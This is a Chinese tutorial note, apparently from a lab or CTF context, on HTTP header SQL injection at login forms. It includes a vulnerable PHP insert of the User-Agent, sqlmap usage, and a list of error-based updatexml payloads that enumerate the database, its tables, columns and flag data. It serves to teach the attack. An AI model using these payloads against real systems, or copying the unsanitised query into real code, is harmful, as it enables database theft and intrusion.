可能出现漏洞的功能模块:登录框
原理:
登录框有时不仅仅查询数据库中有没有对应的用户名和密码,还会将本次登录的ip地址还有请求头存入数据库
因为请求头我们是可以控制的,所以登录框可能存在HEAD注入
select updatexml(1,concat(0x7e,(select database())),1);
0x7e 是波浪号
sqlmap跑header注入:
首先抓包,然后将包的内容复制到sqlmap.py 同级目录下的head.txt,然后在user-agent之后加上*,这样sqlmap就会跑标记的地方。
head注入的前提:
1.要能登录成功,一般情况下只有登录成功后,网站才会将$_SEVER['HTTP_USER_AGENT']的信息存入数据库
2.源码中将mysqli_error($conn) 显示在了页面上
注意:
连接数据库的用户不需要有FILE权限,有SELECT权限就可以:
xiaoming:
xiaohong:
推荐工具:
ModHeader
可能存在header注入的点:
登录框,登录的同时可能存 user_agent ,referer,X_FORWARDED_FOR(就是真实ip)
建议:ModHeader中就把固定的语句存好,到时候登录的时候切换着尝试即可
具体解释:
$uagent = $_SERVER['HTTP_USER_AGENT'];
$Insql = "INSERT INTO uagent (`uagent`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
打开hackbar设置user agent 为:
'or updatexml(1,concat(0x7e,(select database())),1),1)#
原理:'闭合了插入语句的引号
INSERT INTO uagent (`uagent`,`username`) VALUES ('' or updatexml(1,concat(0x7e,(select database())),1),1)#','$uname')"
这条语句会如何执行呢?
首先会执行插入操作,当然因为闭合后的插入语句是错误的,所以插入语句会执行错误。正是因为or之前的插入语句执行错误,所以就会执行 or之后的语句。即:
updatexml(1,concat(0x7e,(select database())),1),1)
如何执行这条语句呢?
首先会执行子查询语句select database(),因为这是前提,然后执行updatexml。
在执行updatexml的时候就发生了报错。
报出的错误被mysqli_error($conn)捕获到,并输出。
注入字典:
测试是否存在head注入:
'or updatexml(1,concat(0x7e,(select database())),1),1)#
查询当前数据库中有哪些表:
'or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() )),1),1)#
查询表中有哪些字段:
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=’表名’ )),1),1)#
查询表中的数据:
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head )),1),1)#